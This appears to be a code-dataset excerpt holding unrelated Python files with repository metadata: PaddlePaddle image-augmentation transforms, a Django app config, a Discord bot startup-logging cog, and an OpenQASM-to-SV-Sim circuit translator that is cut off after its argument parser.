        - output(PIL.Image|np.ndarray|Paddle.Tensor): An image with adjusted contrast.

    Returns:
        A callable object of ContrastTransform.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import ContrastTransform

            transform = ContrastTransform(0.4)
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
    """

    def __init__(self, value, keys=None):
        super(ContrastTransform, self).__init__(keys)
        # Validation is delegated to _check_input, matching the sibling
        # Brightness/Saturation transforms. The previous explicit
        # ``value < 0`` pre-check duplicated that validation and raised a
        # TypeError in Python 3 whenever ``value`` was a list/tuple.
        # NOTE(review): assumes _check_input rejects negative scalar values
        # like it does for 'brightness'/'saturation' -- confirm.
        self.value = _check_input(value, 'contrast')

    def _apply_image(self, img):
        if self.value is None:
            return img
        contrast_factor = random.uniform(self.value[0], self.value[1])
        return F.adjust_contrast(img, contrast_factor)
class SaturationTransform(BaseTransform):
    """Randomly adjust the saturation of the image.

    Args:
        value (float): How much to jitter saturation. Must be non-negative;
            0 leaves the image unchanged.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): An image with adjusted saturation.

    Returns:
        A callable object of SaturationTransform.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import SaturationTransform

            transform = SaturationTransform(0.4)
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
    """

    def __init__(self, value, keys=None):
        super(SaturationTransform, self).__init__(keys)
        # _check_input normalises the jitter amount into a (low, high) range,
        # or None when no adjustment should be applied.
        self.value = _check_input(value, 'saturation')

    def _apply_image(self, img):
        if self.value is None:
            return img
        factor = random.uniform(self.value[0], self.value[1])
        return F.adjust_saturation(img, factor)
class HueTransform(BaseTransform):
    """Randomly adjust the hue of the image.

    Args:
        value (float): How much to jitter hue. Must lie between 0 and 0.5;
            0 leaves the image unchanged.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): An image with adjusted hue.

    Returns:
        A callable object of HueTransform.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import HueTransform

            transform = HueTransform(0.4)
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
    """

    def __init__(self, value, keys=None):
        super(HueTransform, self).__init__(keys)
        # Hue is centred on 0 and clamped to [-0.5, 0.5] rather than the
        # multiplicative range used by the other colour transforms.
        self.value = _check_input(
            value, 'hue', center=0, bound=(-0.5, 0.5), clip_first_on_zero=False)

    def _apply_image(self, img):
        if self.value is None:
            return img
        factor = random.uniform(self.value[0], self.value[1])
        return F.adjust_hue(img, factor)
class ColorJitter(BaseTransform):
    """Randomly change the brightness, contrast, saturation and hue of an image.

    Args:
        brightness (float): How much to jitter brightness.
            Chosen uniformly from [max(0, 1 - brightness), 1 + brightness]. Should be non negative numbers.
        contrast (float): How much to jitter contrast.
            Chosen uniformly from [max(0, 1 - contrast), 1 + contrast]. Should be non negative numbers.
        saturation (float): How much to jitter saturation.
            Chosen uniformly from [max(0, 1 - saturation), 1 + saturation]. Should be non negative numbers.
        hue (float): How much to jitter hue.
            Chosen uniformly from [-hue, hue]. Should have 0<= hue <= 0.5.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): A color jittered image.

    Returns:
        A callable object of ColorJitter.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import ColorJitter

            transform = ColorJitter(0.4, 0.4, 0.4, 0.4)
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
    """

    def __init__(self, brightness=0, contrast=0, saturation=0, hue=0,
                 keys=None):
        super(ColorJitter, self).__init__(keys)
        self.brightness = brightness
        self.contrast = contrast
        self.saturation = saturation
        self.hue = hue

    def _get_param(self, brightness, contrast, saturation, hue):
        """Get a randomized transform to be applied on image.

        Arguments are same as that of __init__.

        Returns:
            Transform which randomly adjusts brightness, contrast and
            saturation in a random order.
        """
        transforms = []
        # Each sub-transform interprets its argument as a jitter amount
        # (see the class docstring); a None entry is skipped entirely.
        if brightness is not None:
            transforms.append(BrightnessTransform(brightness, self.keys))
        if contrast is not None:
            transforms.append(ContrastTransform(contrast, self.keys))
        if saturation is not None:
            transforms.append(SaturationTransform(saturation, self.keys))
        if hue is not None:
            transforms.append(HueTransform(hue, self.keys))
        # Shuffle so the adjustments are applied in a random order; a fresh
        # composite transform is therefore built per image.
        random.shuffle(transforms)
        transform = Compose(transforms)
        return transform

    def _apply_image(self, img):
        """
        Args:
            img (PIL Image): Input image.

        Returns:
            PIL Image: Color jittered image.
        """
        transform = self._get_param(self.brightness, self.contrast,
                                    self.saturation, self.hue)
        return transform(img)
class RandomCrop(BaseTransform):
    """Crops the given CV Image at a random location.

    Args:
        size (sequence|int): Desired output size of the crop. If size is an
            int instead of sequence like (h, w), a square crop (size, size) is
            made.
        padding (int|sequence|optional): Optional padding on each border
            of the image. If a sequence of length 4 is provided, it is used to pad left,
            top, right, bottom borders respectively. Default: None (no padding).
        pad_if_needed (boolean|optional): It will pad the image if smaller than the
            desired size to avoid raising an exception. Default: False.
        fill (int|sequence, optional): Pixel fill value used when padding. Default: 0.
        padding_mode (str, optional): Padding mode passed through to the pad
            operation ('constant', 'edge', 'reflect' or 'symmetric'). Default: 'constant'.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): A random cropped image.

    Returns:
        A callable object of RandomCrop.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import RandomCrop

            transform = RandomCrop(224)
            fake_img = Image.fromarray((np.random.rand(324, 300, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
            print(fake_img.size)
    """

    def __init__(self,
                 size,
                 padding=None,
                 pad_if_needed=False,
                 fill=0,
                 padding_mode='constant',
                 keys=None):
        super(RandomCrop, self).__init__(keys)
        # A bare number means a square crop; normalise to (h, w).
        if isinstance(size, numbers.Number):
            self.size = (int(size), int(size))
        else:
            self.size = size
        self.padding = padding
        self.pad_if_needed = pad_if_needed
        self.fill = fill
        self.padding_mode = padding_mode

    def _get_param(self, img, output_size):
        """Get parameters for ``crop`` for a random crop.

        Args:
            img (PIL Image): Image to be cropped.
            output_size (tuple): Expected output size of the crop.

        Returns:
            tuple: params (i, j, h, w) to be passed to ``crop`` for random crop.
        """
        w, h = _get_image_size(img)
        th, tw = output_size
        if w == tw and h == th:
            return 0, 0, h, w
        # NOTE: random.randint raises ValueError when the image is smaller
        # than the target and pad_if_needed was left False.
        i = random.randint(0, h - th)
        j = random.randint(0, w - tw)
        return i, j, th, tw

    def _apply_image(self, img):
        """
        Args:
            img (PIL Image): Image to be cropped.

        Returns:
            PIL Image: Cropped image.
        """
        if self.padding is not None:
            img = F.pad(img, self.padding, self.fill, self.padding_mode)

        w, h = _get_image_size(img)

        # pad the width if needed
        if self.pad_if_needed and w < self.size[1]:
            img = F.pad(img, (self.size[1] - w, 0), self.fill,
                        self.padding_mode)
        # pad the height if needed
        if self.pad_if_needed and h < self.size[0]:
            img = F.pad(img, (0, self.size[0] - h), self.fill,
                        self.padding_mode)

        i, j, h, w = self._get_param(img, self.size)
        return F.crop(img, i, j, h, w)
class Pad(BaseTransform):
    """Pads the given CV Image on all sides with the given "pad" value.

    Args:
        padding (int|list|tuple): Padding on each border. If a single int is provided this
            is used to pad all borders. If list/tuple of length 2 is provided this is the padding
            on left/right and top/bottom respectively. If a list/tuple of length 4 is provided
            this is the padding for the left, top, right and bottom borders
            respectively.
        fill (int|list|tuple): Pixel fill value for constant fill. Default is 0. If a list/tuple of
            length 3, it is used to fill R, G, B channels respectively.
            This value is only used when the padding_mode is constant
        padding_mode (str): Type of padding. Should be: constant, edge, reflect or symmetric. Default is constant.
            ``constant`` means pads with a constant value, this value is specified with fill.
            ``edge`` means pads with the last value at the edge of the image.
            ``reflect`` means pads with reflection of image (without repeating the last value on the edge)
            padding ``[1, 2, 3, 4]`` with 2 elements on both sides in reflect mode
            will result in ``[3, 2, 1, 2, 3, 4, 3, 2]``.
            ``symmetric`` means pads with reflection of image (repeating the last value on the edge)
            padding ``[1, 2, 3, 4]`` with 2 elements on both sides in symmetric mode
            will result in ``[2, 1, 1, 2, 3, 4, 4, 3]``.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): A padded image.

    Returns:
        A callable object of Pad.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import Pad

            transform = Pad(2)
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
            print(fake_img.size)
    """

    def __init__(self, padding, fill=0, padding_mode='constant', keys=None):
        # Reject clearly invalid inputs before normalising them.
        assert isinstance(padding, (numbers.Number, list, tuple))
        assert isinstance(fill, (numbers.Number, str, list, tuple))
        assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']

        # Normalise lists to tuples so downstream code sees immutable values.
        if isinstance(padding, list):
            padding = tuple(padding)
        if isinstance(fill, list):
            fill = tuple(fill)

        if isinstance(padding, Sequence) and len(padding) not in [2, 4]:
            raise ValueError(
                "Padding must be an int or a 2, or 4 element tuple, not a " +
                "{} element tuple".format(len(padding)))

        super(Pad, self).__init__(keys)
        self.padding = padding
        self.fill = fill
        self.padding_mode = padding_mode

    def _apply_image(self, img):
        """
        Args:
            img (PIL Image): Image to be padded.

        Returns:
            PIL Image: Padded image.
        """
        return F.pad(img, self.padding, self.fill, self.padding_mode)
class RandomRotation(BaseTransform):
    """Rotates the image by angle.

    Args:
        degrees (sequence or float or int): Range of degrees to select from.
            If degrees is a number instead of sequence like (min, max), the range of degrees
            will be (-degrees, +degrees) clockwise order.
        interpolation (str, optional): Interpolation method. If omitted, or if the
            image has only one channel, it is set to PIL.Image.NEAREST or cv2.INTER_NEAREST
            according the backend. when use pil backend, support method are as following:
            - "nearest": Image.NEAREST,
            - "bilinear": Image.BILINEAR,
            - "bicubic": Image.BICUBIC
            when use cv2 backend, support method are as following:
            - "nearest": cv2.INTER_NEAREST,
            - "bilinear": cv2.INTER_LINEAR,
            - "bicubic": cv2.INTER_CUBIC
        expand (bool|optional): Optional expansion flag. Default: False.
            If true, expands the output to make it large enough to hold the entire rotated image.
            If false or omitted, make the output image the same size as the input image.
            Note that the expand flag assumes rotation around the center and no translation.
        center (2-tuple|optional): Optional center of rotation.
            Origin is the upper left corner.
            Default is the center of the image.
        fill (int, optional): Fill value used for the area outside the rotated
            image. Default: 0.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): A rotated image.

    Returns:
        A callable object of RandomRotation.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import RandomRotation

            transform = RandomRotation(90)
            fake_img = Image.fromarray((np.random.rand(200, 150, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
            print(fake_img.size)
    """

    def __init__(self,
                 degrees,
                 interpolation='nearest',
                 expand=False,
                 center=None,
                 fill=0,
                 keys=None):
        # A scalar is interpreted as a symmetric range (-degrees, +degrees).
        if isinstance(degrees, numbers.Number):
            if degrees < 0:
                raise ValueError(
                    "If degrees is a single number, it must be positive.")
            self.degrees = (-degrees, degrees)
        else:
            if len(degrees) != 2:
                raise ValueError(
                    "If degrees is a sequence, it must be of len 2.")
            self.degrees = degrees

        super(RandomRotation, self).__init__(keys)
        self.interpolation = interpolation
        self.expand = expand
        self.center = center
        self.fill = fill

    def _get_param(self, degrees):
        # Draw one rotation angle uniformly from the configured range.
        angle = random.uniform(degrees[0], degrees[1])
        return angle

    def _apply_image(self, img):
        """
        Args:
            img (PIL.Image|np.array): Image to be rotated.

        Returns:
            PIL.Image or np.array: Rotated image.
        """
        angle = self._get_param(self.degrees)

        return F.rotate(img, angle, self.interpolation, self.expand,
                        self.center, self.fill)
class Grayscale(BaseTransform):
    """Convert the input image to grayscale.

    Args:
        num_output_channels (int): Number of channels of the output image,
            either 1 or 3. With 3 channels, all are equal (r == g == b).
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): Grayscale version of the input image.

    Returns:
        A callable object of Grayscale.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import Grayscale

            transform = Grayscale()
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
            print(np.array(fake_img).shape)
    """

    def __init__(self, num_output_channels=1, keys=None):
        super(Grayscale, self).__init__(keys)
        self.num_output_channels = num_output_channels

    def _apply_image(self, img):
        """Return a grayscale rendering of ``img`` via the functional backend."""
        return F.to_grayscale(img, self.num_output_channels)
| 34.369288 | 114 | 0.587124 |
b2b669eef745e198b918a4a4229024633a13600a | 95 | py | Python | recyclebin/apps.py | XanderTerbl1/FileUp | ca6221a3d3b106dcbac99f4413e7a4845eac6842 | [
"MIT"
] | 2 | 2020-06-30T08:49:54.000Z | 2020-09-18T13:59:00.000Z | recyclebin/apps.py | XanderTerbl1/FileUp | ca6221a3d3b106dcbac99f4413e7a4845eac6842 | [
"MIT"
] | 11 | 2019-12-04T23:45:34.000Z | 2022-02-10T13:22:03.000Z | recyclebin/apps.py | XanderTerbl1/FileUp | ca6221a3d3b106dcbac99f4413e7a4845eac6842 | [
"MIT"
] | 2 | 2020-05-19T06:53:24.000Z | 2020-10-08T20:11:29.000Z | from django.apps import AppConfig
class RecyclebinConfig(AppConfig):
    """Django application configuration for the ``recyclebin`` app."""

    name = 'recyclebin'
| 15.833333 | 34 | 0.768421 |
2d03cd5805850cca3519ef75334047f291049240 | 1,172 | py | Python | bot/exts/backend/logging.py | hugovk/bot | 46d3f877b569a8a6db8a50fbd80ff49c90ba04cf | [
"MIT",
"BSD-3-Clause"
] | 1,003 | 2018-11-17T21:10:01.000Z | 2022-03-31T22:50:39.000Z | bot/exts/backend/logging.py | hugovk/bot | 46d3f877b569a8a6db8a50fbd80ff49c90ba04cf | [
"MIT",
"BSD-3-Clause"
] | 1,474 | 2018-11-17T10:18:14.000Z | 2022-03-31T18:01:39.000Z | bot/exts/backend/logging.py | hugovk/bot | 46d3f877b569a8a6db8a50fbd80ff49c90ba04cf | [
"MIT",
"BSD-3-Clause"
] | 771 | 2018-11-21T08:36:07.000Z | 2022-03-31T14:56:39.000Z | from discord import Embed
from discord.ext.commands import Cog
from bot.bot import Bot
from bot.constants import Channels, DEBUG_MODE
from bot.log import get_logger
from bot.utils import scheduling
log = get_logger(__name__)
class Logging(Cog):
    """Debug logging module."""

    def __init__(self, bot: Bot):
        self.bot = bot
        # Kick off the greeting as soon as the cog is constructed, on the
        # bot's own event loop.
        scheduling.create_task(self.startup_greeting(), event_loop=self.bot.loop)

    async def startup_greeting(self) -> None:
        """Announce our presence to the configured devlog channel."""
        await self.bot.wait_until_guild_available()
        log.info("Bot connected!")

        embed = Embed(description="Connected!")
        embed.set_author(
            name="Python Bot",
            url="https://github.com/python-discord/bot",
            icon_url=(
                "https://raw.githubusercontent.com/"
                "python-discord/branding/main/logos/logo_circle/logo_circle_large.png"
            )
        )

        # Skip the announcement in local/debug runs.
        if not DEBUG_MODE:
            await self.bot.get_channel(Channels.dev_log).send(embed=embed)
def setup(bot: Bot) -> None:
    """Load the Logging cog."""
    bot.add_cog(Logging(bot))
| 27.904762 | 86 | 0.647611 |
18e3264b81bd595d81335ddb577d7885a04fe956 | 13,678 | py | Python | svsim/tool/svsim_qasm.py | yukwangmin/SV-Sim | 1b6b71cb490e7a1eac3d6ebc24777590d48378de | [
"MIT"
] | null | null | null | svsim/tool/svsim_qasm.py | yukwangmin/SV-Sim | 1b6b71cb490e7a1eac3d6ebc24777590d48378de | [
"MIT"
] | null | null | null | svsim/tool/svsim_qasm.py | yukwangmin/SV-Sim | 1b6b71cb490e7a1eac3d6ebc24777590d48378de | [
"MIT"
] | null | null | null | # ---------------------------------------------------------------------------
# SV-Sim: Density-Matrix Quantum Circuit Simulation Environement
# ---------------------------------------------------------------------------
# Ang Li, Senior Computer Scientist
# Pacific Northwest National Laboratory(PNNL), U.S.
# Homepage: http://www.angliphd.com
# GitHub repo: http://www.github.com/pnnl/SV-Sim
# PNNL-IPID: 31919-E, ECCN: EAR99, IR: PNNL-SA-143160
# BSD Lincese.
# ---------------------------------------------------------------------------
# File: svsim_qasm.py
# Translate OpenQASM assembly code to SVSim python code
# ---------------------------------------------------------------------------
import argparse
import string
import os
import cmath
import sys
import math
#======= Description ========
# Try to address two types of circuits in OpenQASM code:
#  (1) User-defined functional module circuit
#  (2) Main circuits
#======= Global tables and variables =========

# Standard gates are gates defined in the OpenQASM header.
# Dictionary in {"gate name": number of standard gates inside}
STANDARD_GATE_TABLE = {
    "u3":1,  #3-parameter 2-pulse single qubit gate
    "u2":1,  #2-parameter 1-pulse single qubit gate
    "u1":1,  #1-parameter 0-pulse single qubit gate
    "cx":1,  #controlled-NOT
    "id":1,  #idle gate(identity)
    "x":1,   #Pauli gate: bit-flip
    "y":1,   #Pauli gate: bit and phase flip
    "z":1,   #Pauli gate: phase flip
    "h":1,   #Clifford gate: Hadamard
    "s":1,   #Clifford gate: sqrt(Z) phase gate
    "sdg":1, #Clifford gate: conjugate of sqrt(Z)
    "t":1,   #C3 gate: sqrt(S) phase gate
    "tdg":1, #C3 gate: conjugate of sqrt(S)
    "rx":1,  #Rotation around X-axis
    "ry":1,  #Rotation around Y-axis
    "rz":1,  #Rotation around Z-axis
    "c1":1,  #Arbitrary 1-qubit gate
    "c2":1}  #Arbitrary 2-qubit gate

# Composition gates are gates defined in the OpenQASM header.
# Dictionary in {"gate name": number of standard gates inside}
COMPOSITION_GATE_TABLE = {
    "cz":3,       #Controlled-Phase
    "cy":3,       #Controlled-Y
    "swap":3,     #Swap
    "ch":11,      #Controlled-H
    "ccx":15,     #C3 gate: Toffoli
    "cswap":17,   #Fredkin
    "crx":5,      #Controlled RX rotation
    "cry":4,      #Controlled RY rotation
    "crz":4,      #Controlled RZ rotation
    "cu1":5,      #Controlled phase rotation
    "cu3":5,      #Controlled-U
    "rxx":7,      #Two-qubit XX rotation
    "rzz":3,      #Two-qubit ZZ rotation
    "rccx":9,     #Relative-phase CCX
    "rc3x":18,    #Relative-phase 3-controlled X gate
    "c3x":27,     #3-controlled X gate
    "c3sqrtx":27, #3-controlled sqrt(X) gate
    "c4x":87      #4-controlled X gate
    }

# OpenQASM native gate table, other gates are user-defined.
# NOTE: dict(A, **B) merges the two tables on both Python 2 and 3; the
# previous dict(A.items() + B.items()) form only worked on Python 2, where
# items() returned concatenable lists rather than views.
GATE_TABLE = dict(STANDARD_GATE_TABLE, **COMPOSITION_GATE_TABLE)

# ==================================================================================
# For the statistics of the number of CNOT or CX gates in the circuit.
# Number of CX in Standard gates
STANDARD_CX_TABLE = { "u3":0, "u2":0, "u1":0, "cx":1, "id":0, "x":0, "y":0, "z":0, "h":0,
        "s":0, "sdg":0, "t":0, "tdg":0, "rx":0, "ry":0, "rz":0, "c1":0, "c2":1}
# Number of CX in Composition gates
COMPOSITION_CX_TABLE = {"cz":1, "cy":1, "swap":3, "ch":2, "ccx":6, "cswap":8, "crx":2, "cry":2,
        "crz":2, "cu1":2, "cu3":2, "rxx":2, "rzz":2, "rccx":3, "rc3x":6, "c3x":6, "c3sqrtx":6,
        "c4x":18}
# Same Python-2/3-portable merge as GATE_TABLE above.
CX_TABLE = dict(STANDARD_CX_TABLE, **COMPOSITION_CX_TABLE)

# We need to map from a user-defined local qubit-register to a unified global array for SV-Sim
global_array = {}  #Field start position
field_length = {}  #Field length
gate_num = 0       #Running count of basic gates emitted
cx_num = 0         #Running count of CNOT gates emitted
seg_num = 0
SM = "sm_70"

# To register and look-up user-defined functions in QASM
# Format: {"function_name": gate_num}
function_table = {}
# Format: {"function_name": cx_gate_num}
cx_table = {}

# Keywords in QASM that are currently not used
other_keys = ["measure", "barrier", "OPENQASM", "include", "creg", "if", "reset"]
#======= Helper Function ========
def get_op(line):
    """Return the operation mnemonic of a QASM statement.

    The mnemonic is the first whitespace-delimited token, with any
    parenthesised parameter list stripped off first (so ``"u3(0.1) q[0];"``
    yields ``"u3"``).
    """
    paren = line.find("(")
    if paren != -1:
        line = line[:paren].strip()
    return line.split(" ")[0].strip()
#======= Mapping Functions =========
# Mapping from qreg to global array
def qreg_to_ga(qreg_string):
    """Map a qubit-register reference to its offset in the unified global array.

    ``"q[3]"`` becomes ``str(global_array["q"] + 3)``. A bare field name that
    is registered in ``global_array`` maps to its base offset; any other
    string (e.g. a symbolic parameter) is passed through unchanged.

    Relies on the module-level ``global_array`` populated by parse().
    """
    if qreg_string.find("[") != -1:
        # Indexed reference: base offset of the field plus the index.
        field = qreg_string[:qreg_string.find("[")].strip()
        field_shift = int(qreg_string[qreg_string.find("[")+1:qreg_string.find("]")])
        ga_shift = str(global_array[field] + field_shift)
    else:
        field = qreg_string.strip()
        ga_shift = ""
        if field in global_array:
            ga_shift += str(global_array[field])
        else:
            # Not a known register: pass the token through verbatim.
            ga_shift += field
    return ga_shift
# Mapping for a param_list, such as "cout[3], cin[2], par[0]"
def paramlist_to_ga(param_list):
    """Map a QASM argument list to global-array index strings.

    Numeric parameters inside parentheses are evaluated (with ``pi`` bound)
    and prepended; register operands are remapped via qreg_to_ga(). A bare
    register name of width > 1 expands the statement into one entry per bit,
    so the result is a list of argument strings, one per emitted gate.

    NOTE(review): uses ``eval`` on the parameter expressions from the input
    QASM file -- acceptable for trusted circuit files only.
    """
    slist = []
    recursive = False
    if param_list.find(')') != -1:
        # Parenthesised numeric parameters: evaluate each expression now.
        recursive = True
        slist.append("")
        gate_param = param_list.split(')')[0].split(',')
        gate_param = [p.strip().strip('(').strip() for p in gate_param]
        for expr in gate_param:
            slist[0] += str(eval(expr, {'pi':cmath.pi})) + ", "
        param_list = param_list.split(')')[1]
    params = param_list.strip(';').split(",")
    params = [i.strip() for i in params]
    #check if any param is a vector (a whole multi-bit register)
    num_bits = 1
    for param in params:
        if (param.find('[') == -1) and (param in field_length) and field_length[param]>1:
            num_bits = field_length[param]
            break
    # Emit one argument string per expanded bit position.
    for b in range(0,num_bits):
        s = ""
        for param in params:
            if param != "":
                if (param.find('[') == -1) and (param in field_length) and field_length[param]>1:
                    if b >= field_length[param]:
                        # Vector operands of differing widths cannot be zipped.
                        print ("Error in Syntax!")
                        exit()
                    else:
                        param = param + '[' + str(b) + ']'
                ga_shift = qreg_to_ga(param)
                s += str(ga_shift) + ", "
        if recursive:
            # Numeric parameters were already placed in slist[0]; append operands.
            slist[-1] = slist[-1] + s[:-2]
        else:
            slist.append(s[:-2])
    return slist
# Look up built-in or user-defined gates in a user-defined gate function
def function_gate(line, line_id):
    """Translate one statement found inside a user-defined gate body.

    Args:
        line: a single (semicolon-free) QASM statement.
        line_id: source line number, used for error reporting only.

    Returns:
        tuple: (emitted Python text, basic-gate count, CNOT count).
    """
    s = str("")
    n = 0
    cx = 0
    line = line.strip()
    if line == "":
        return s, n, cx
    op = get_op(line)
    if op in function_table: # User-defined gate function
        s = "\t" + op + "(sim, "
        line = line[len(op)+1:].replace(')','),')
        params = line.split(",")
        for param in params:
            s += param.strip() + ", "
        # NOTE(review): the emitted line ends in "):" rather than ")" --
        # presumably relying on the trailing replace above; verify the
        # generated code against a nested-gate example.
        s = s[:-2] + "):\n"
        n = function_table[op]
        cx = cx_table[op]
    elif op in GATE_TABLE: # OpenQASM built-in gate
        paramlist_ga = paramlist_to_ga(line[line.find(" ")+1:])
        for p in paramlist_ga:
            s += "\tsim.append(sim." + op.upper() + "(" + p + "))\n"
        n = len(paramlist_ga) * GATE_TABLE[op]
        cx = len(paramlist_ga) * CX_TABLE[op]
    elif op in ['{','}']:
        # Braces delimiting the gate body carry no semantics here.
        s = ""
    else:
        print ('==Line-' + str(line_id) + ': "' + line + '" is not a gate in Function!')
    return s,n,cx
# Look up built-in gates in the global circuit
def builtin_gate(line, line_id):
    """Translate one built-in OpenQASM gate statement into SV-Sim calls.

    Args:
        line: a single (semicolon-free) QASM statement, e.g. ``"cx a[0],b[1]"``.
        line_id: source line number, used for error reporting only.

    Returns:
        tuple: ``(code, gate_count, cx_count)`` where ``code`` is the emitted
        Python text, ``gate_count`` the number of basic gates it represents
        and ``cx_count`` the number of CNOTs among them.
    """
    s = str("")
    n = 0
    cx = 0
    line = line.strip()
    if line == "":
        # Bug fix: this early exit used to return only ``s``, which broke the
        # three-way tuple unpacking at the call site in parse(). Return the
        # same shape as function_gate() does for empty input.
        return s, n, cx
    op = get_op(line)
    if op in GATE_TABLE:
        if line.find("(") != -1:
            # Separate the parameter list so paramlist_to_ga can see it.
            line = line.replace("("," (")
            line = line.replace(")","),")
        paramlist_ga = paramlist_to_ga(line[line.find(" ")+1:])
        for p in paramlist_ga:
            s += "sim.append(sim." + op.upper() + "(" + p + "))\n"
        n = len(paramlist_ga) * GATE_TABLE[op]
        cx = len(paramlist_ga) * CX_TABLE[op]
    else:
        print ('==Line-' + str(line_id) + ': "' + line + '" is not a gate!')
    return s, n, cx
## Parsing the source OpenQASM file line by line
def parse(infile, mainfile):
    """Translate an OpenQASM source file into SV-Sim Python circuit code.

    Reads ``infile`` line by line and writes the generated program to
    ``mainfile``. Handles user comments, ``gate`` definitions (registered in
    ``function_table``/``cx_table``), ``qreg`` declarations (mapped into
    ``global_array``/``field_length``), built-in gates and calls to
    previously defined gates. Updates the module-level gate statistics.
    """
    global global_array
    global field_length
    global function_table
    global cx_table
    global gate_num
    global cx_num
    global seg_num
    # NOTE(review): prev_gate_num, start_global_circuit and seg_num are set
    # but never used below -- presumably leftovers; confirm before removal.
    prev_gate_num = 0
    qreg_idx = 0
    start_global_circuit = False
    s = str("")
    outfile = mainfile
    outfile.write("sim = svsim.Simulation(int(sys.argv[1]), int(sys.argv[2]))\n\n")
    lines = infile.readlines()
    i = 0
    while i < len(lines):
        l = lines[i].strip().strip('\n')
        s = ""
        if l != "":
            ## User-defined comments are carried over as Python comments.
            if l.lstrip().startswith("//"):
                s += '#' + l[l.find("//")+2:] + "\n"
                outfile.write(s)
            else:
                # If comment at end, extract op
                if l.find("//") != -1:
                    l = l[:l.find("//")]
                # Start to parse
                op = get_op(l)
                # Invoke user-defined function
                if op in function_table:
                    s = ""
                    paramlist_ga = paramlist_to_ga(l[len(op)+1:-1])
                    for p in paramlist_ga:
                        s += "" + op + "(sim, " + p + ")\n"
                    gate_num += len(paramlist_ga) * function_table[op]
                    cx_num += len(paramlist_ga) * cx_table[op]
                # User-defined gate function definition
                elif op == "gate":
                    ll = l.split(" ")
                    gate_name = ll[1].strip()
                    qregs = ll[2].strip().split(",")
                    params = ""
                    pos = gate_name.find('(')
                    n = 0
                    cx = 0
                    if pos != -1: #extra params
                        # NOTE(review): gate_name is truncated before params
                        # are sliced from it, so params is extracted from the
                        # already-shortened string -- looks like a bug for
                        # parameterised gate definitions; verify.
                        gate_name = gate_name[:pos]
                        params = gate_name[pos+1:gate_name.find(')')].strip()
                    s = "def " + gate_name \
                        + "(sim"
                    if params != "":
                        for param in params.split(','):
                            s += ", " + param
                    for qreg in qregs:
                        s += ", " + qreg
                    s += "):\n"
                    i = i+1 #jump {
                    l = lines[i].strip().strip('\n')
                    # Consume the gate body until the closing brace.
                    while not l.startswith("}"):
                        ll = l.split(";")
                        for g in ll:
                            s1, n1, cx1 = function_gate(g,i)
                            s += s1
                            n += n1
                            cx += cx1
                        i = i+1
                        l = lines[i].strip().strip('\n')
                    s += "\n"
                    # Register the new gate and its gate/CNOT counts.
                    function_table[gate_name] = n
                    cx_table[gate_name] = cx
                #Define quantum register, build up global array
                elif op == "qreg":
                    ll = l.split(" ")[1]
                    field = ll[:ll.find("[")]
                    bits = int(ll[ll.find("[")+1:ll.find("]")])
                    global_array[field] = qreg_idx
                    field_length[field] = bits
                    qreg_idx += bits
                #Built-in gate invocation
                elif op in GATE_TABLE:
                    ss, n, cx = builtin_gate(l,i)
                    gate_num += n
                    s += ss
                    cx_num += cx
                #Other keywords not-realized
                elif op in other_keys:
                    s = ""
                else:
                    print ("Unknown symbol: " + op)
                outfile.write(s)
        i = i+1
    # Trailer: upload the circuit, run it and measure.
    s = "\nsim.upload()\n"
    s += "sim.run()\n"
    s += "sim.measure(10)\n"
    outfile.write(s)
# Main Program
parser = argparse.ArgumentParser(description='SV-Sim Assembler for OpenQASM-V2.0: translating OpenQASM to SV-sim native simulation circuit code.')
parser.add_argument('--input', '-i', help='input OpenQASM file, such as adder.qasm')
